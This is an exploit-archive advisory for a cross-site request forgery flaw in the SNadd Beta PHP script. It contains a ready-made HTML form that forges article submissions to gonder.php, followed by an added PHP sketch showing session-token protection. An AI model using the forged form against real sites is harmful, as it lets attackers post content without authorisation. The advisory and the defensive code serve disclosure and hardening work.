SNadd Beta suffers from a cross-site request forgery vulnerability.
[+] Discovered by : Septemb0x
[+] Script Name : SNadd Beta
[+] Download Script : http://www.phpexplorer.com/goster/1191
[+] Bug Description : New article can be added
Exploit Codes :
<form method="POST" action="[sitename]/[scriptpath]/gonder.php">
<b>Başlık:</b><br>
<input type="text" name="baslik" size="62"><br><br>
<b>Yazı:</b><br>
<textarea name="yazi" cols="47" rows="12"></textarea><br><br>
<input type="submit" value="Ekle >>" name="ekle">
</form>
[+] Greetz : BARCOD3 - Bhdr - Phreaker - Nizam-ul Mülk - Türkeşhan - SenqRonize... All Friends...
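Mitigation sketch (an added example, not SNadd's own code and not part of the original advisory): the form above contains no value tied to the user's session, so a handler can reject forged posts by requiring a per-session token. The field names baslik, yazi and ekle come from the advisory; the function names, the csrf_token session key and the commented save_article() call are assumptions.

```php
<?php
// Added example: hypothetical hardened front end for a handler like gonder.php.
// Only the field names baslik/yazi/ekle are taken from the advisory.
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
// Non-string input (e.g. csrf_token[]=x) is rejected before hash_equals().
function csrf_valid($submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ekle'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    unset($_SESSION['csrf_token']); // single use: a new token is issued next time
    $baslik = is_string($_POST['baslik'] ?? null) ? trim($_POST['baslik']) : '';
    $yazi   = is_string($_POST['yazi'] ?? null) ? trim($_POST['yazi']) : '';
    // save_article() stands in for the script's own storage code (assumed name).
    // save_article($baslik, $yazi);
    exit('Article accepted');
}
?>
<form method="POST" action="gonder.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="baslik" size="62"><br>
  <textarea name="yazi" cols="47" rows="12"></textarea><br>
  <input type="submit" value="Ekle >>" name="ekle">
</form>
```

A request built on another site cannot read the session's token, so the POST is answered with 403 before any article is stored.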